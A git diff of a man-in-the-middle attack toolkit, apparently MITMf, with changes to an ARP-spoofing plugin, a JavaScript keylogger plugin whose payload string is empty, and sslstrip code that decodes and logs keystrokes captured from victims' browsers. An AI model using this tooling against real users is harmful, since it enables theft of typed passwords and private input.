diff --git a/plugins/ArpSpoof.py b/plugins/ArpSpoof.py
index db61fa9..c082f03 100644
--- a/plugins/ArpSpoof.py
+++ b/plugins/ArpSpoof.py
@@ -33,7 +33,7 @@ class ArpSpoof(Plugin):
if self.interface == None or self.routerip == None:
sys.exit("[-] %s plugin requires --routerip and --interface" % self.name)
- print "[*] ArpSpoof plugin online"
+ print "[*] %s plugin online" % name
if self.setup == True:
print '[*] Setting up ip_forward and iptables'
file = open('/proc/sys/net/ipv4/ip_forward', 'w')
diff --git a/plugins/jskeylogger.py b/plugins/jskeylogger.py
index db04c5c..ab8f3c6 100644
--- a/plugins/jskeylogger.py
+++ b/plugins/jskeylogger.py
@@ -9,14 +9,15 @@ class jskeylogger(Inject, Plugin):
def initialize(self,options):
Inject.initialize(self, options)
- self.html_payload = self.get_payload()
+ self.html_payload = self.msf_keylogger()
print "[*] %s online" % self.name
- def get_payload(self):
- #simple js keylogger stolen from http://wiremask.eu/xss-keylogger/
+ def msf_keylogger(self):
+ #Stolen from the Metasploit module http_javascript_keylogger
payload = """"""
return payload
\ No newline at end of file
diff --git a/sslstrip/ServerConnection.py b/sslstrip/ServerConnection.py
index 0aa54c5..b4bad00 100644
--- a/sslstrip/ServerConnection.py
+++ b/sslstrip/ServerConnection.py
@@ -80,7 +80,24 @@ class ServerConnection(HTTPClient):
logging.warning(str(self.client.getClientIP()) + " Browser Profilerer data:\n" + out)
elif 'keylog' in self.uri:
- logging.warning(str(self.client.getClientIP()) + " ["+ self.headers['host'] + "] " "Keys: " + self.postData)
+ keys = self.postData.split(",")
+ del keys[0]; del(keys[len(keys)-1])
+
+ nice = ''
+ for n in keys:
+ if n == '9':
+ nice += ""
+ elif n == '8':
+ nice = nice.replace(nice[-1:], "")
+ elif n == '13':
+ nice = ''
+ else:
+ try:
+ nice += n.decode('hex')
+ except:
+ print "ERROR: unknown char " + n
+
+ logging.warning(str(self.client.getClientIP()) + " ["+ self.headers['host'] + "] " "Keys: " + nice)
else:
logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData))